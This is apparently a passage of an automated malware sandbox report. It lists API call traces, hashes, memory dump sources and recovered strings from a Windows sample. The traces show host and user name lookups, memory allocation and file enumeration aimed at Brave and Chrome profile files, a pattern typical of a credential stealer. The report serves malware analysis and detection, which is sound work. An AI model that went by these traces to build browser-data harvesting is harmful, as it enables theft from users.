                                                        • Snapshot File: hcaresult_0_2_2e89000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: e9e46244df868b94ef5cb64861f2f292ff0a10aed038b4defd39ffdfed9759c4
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: 5EF0F6329407106BD7203BF5998DBBF76E8BF49329F105129F68E916C1DBB0E8454A61
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000400,?,?,02CF0223,?,?), ref: 02CF0E19
                                                        • SetErrorMode.KERNEL32(00000000,?,?,02CF0223,?,?), ref: 02CF0E1E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction ID: f40b6a7c0d257f705cb0e7d4435728bf201dbb2aa5362d75ca5dd7b1c55b98c4
                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction Fuzzy Hash: 97D01231545128B7D7402A94DC09BCD7B1CDF05B66F008011FB0DD9081C770964046E5
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Virtual$AllocFree
                                                        • String ID:
                                                        • API String ID: 2087232378-0
                                                        • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                        • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                        • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                        • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                        APIs
                                                          • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                          • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                          • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                          • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                          • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                          • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                        • ExitProcess.KERNEL32 ref: 004011C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$Process$AllocName$ComputerExitUser
                                                        • String ID:
                                                        • API String ID: 1004333139-0
                                                        • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                        • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                        • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                        • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02E89AEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574915404.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E89000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2e89000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: f7279fa744bbc42d0e3b1c1416385dce0ad2a0590acfea306cc2abc7b4cbcda6
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: A1112D79A40208EFDB01DF98C985E98BBF5EF08351F058094F9489B362D371EA50DF84
                                                        APIs
                                                        • wsprintfA.USER32 ref: 004138CC
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                        • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                        • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                        • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$P2Wu$1Wu
                                                        • API String ID: 1125553467-2167636613
                                                        • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                        • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                        • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                        • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                                        • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                                        • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                                        • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID: Brave$Google Chrome$P2Wu$Preferences$\Brave\Preferences$1Wu
                                                        • API String ID: 3334442632-560389872
                                                        • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                        • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                                        • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                        • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                                        APIs
                                                        • wsprintfA.USER32 ref: 0041492C
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                        • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                        • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                        • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\%s$%s\%s$%s\*$P2Wu$1Wu
                                                        • API String ID: 180737720-3802990441
                                                        • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                        • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                        • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                        • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                        • wsprintfA.USER32 ref: 004145A6
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                        • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                        • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                        • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                        • lstrcatA.KERNEL32(?,02EBB138,?,00000104), ref: 004146C5
                                                        • lstrcatA.KERNEL32(?,02EBA4C8), ref: 004146D8
                                                        • lstrlenA.KERNEL32(?), ref: 004146E5
                                                        • lstrlenA.KERNEL32(?), ref: 004146F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                        • String ID: %s\%s$%s\*$P2Wu$1Wu
                                                        • API String ID: 13328894-174619713
                                                        • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                        • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                        • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                        • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                        APIs
                                                        • wsprintfA.USER32 ref: 02D03B33
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 02D03B4A
                                                        • lstrcat.KERNEL32(?,?), ref: 02D03B9C
                                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 02D03BAE
                                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 02D03BC4
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02D03ECE
                                                        • FindClose.KERNEL32(000000FF), ref: 02D03EE3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 1125553467-0
                                                        • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                        • Instruction ID: 720dc35184b27efa9bdb8fc99c30d87d047b80a6e2349fbd473b867fe584c9e7
                                                        • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                        • Instruction Fuzzy Hash: 35A171B5A40218ABDB74DFA4DC84FEE737AFF49300F044589A60D96290DB749B84CF62
                                                        APIs
                                                        • wsprintfA.USER32 ref: 02D04B93
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 02D04BAA
                                                        • StrCmpCA.SHLWAPI(?,00420FDC), ref: 02D04BD8
                                                        • StrCmpCA.SHLWAPI(?,00420FE0), ref: 02D04BEE
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02D04DE4
                                                        • FindClose.KERNEL32(000000FF), ref: 02D04DF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID:
                                                        • API String ID: 180737720-0
                                                        • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                        • Instruction ID: 432a958e4c019dad78da4f10d11d4a7e015011d234982721a3afa0fd67dc0ca1
                                                        • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                        • Instruction Fuzzy Hash: A9617975940218BBCB24EBE0DD84FEA737DFB49300F44458DA60D92190EB759B45CFA1
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00413EC3
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                        • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                        • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                        • FindClose.KERNEL32(000000FF), ref: 00414081
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\%s$P2Wu$1Wu
                                                        • API String ID: 180737720-3431383865
                                                        • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                        • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                        • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                        • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 02CFC15C
                                                        • StrCmpCA.SHLWAPI(?,004213F8), ref: 02CFC1B4
                                                        • StrCmpCA.SHLWAPI(?,004213FC), ref: 02CFC1CA
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02CFCA26
                                                        • FindClose.KERNEL32(000000FF), ref: 02CFCA38
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                        • Instruction ID: 84b31cba39d7cd267dc4a52b33b8d2d5b828d666ece0a66fc4655b3aa5808be2
                                                        • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                        • Instruction Fuzzy Hash: 34422276A102189BCB54FBA0DD95FED737AEF94304F40415DA60A961E0EE34AF48CFA1
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02D047E7
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D047EE
                                                        • wsprintfA.USER32 ref: 02D0480D
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 02D04824
                                                        • StrCmpCA.SHLWAPI(?,00420FC4), ref: 02D04852
                                                        • StrCmpCA.SHLWAPI(?,00420FC8), ref: 02D04868
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 02D048F2
                                                        • FindClose.KERNEL32(000000FF), ref: 02D04907
                                                        • lstrcat.KERNEL32(?,0064A524), ref: 02D0492C
                                                        • lstrcat.KERNEL32(?,0064A22C), ref: 02D0493F
                                                        • lstrlen.KERNEL32(?), ref: 02D0494C
                                                        • lstrlen.KERNEL32(?), ref: 02D0495D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                        • String ID:
                                                        • API String ID: 671575355-0
                                                        • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                        • Instruction ID: ad213f1c6dee6abe07ff0b3ed623d509e13973a92e3c6456e0772b290df4e4cb
                                                        • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                        • Instruction Fuzzy Hash: 575177B9940218ABC764EBB0DD88FEE737DEB59300F404589E64D92190EB74DB84CFA1
                                                        APIs
                                                        • wsprintfA.USER32 ref: 0040ED3E
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                        • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                        • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                        • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\*.*$P2Wu$1Wu
                                                        • API String ID: 180737720-1253669874
                                                        • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                        • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                        • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                        • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                        • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                        • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                        • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                        • String ID: 4@$P2Wu$\*.*$1Wu
                                                        • API String ID: 2325840235-1371421216
                                                        • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                        • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                        • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                        • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
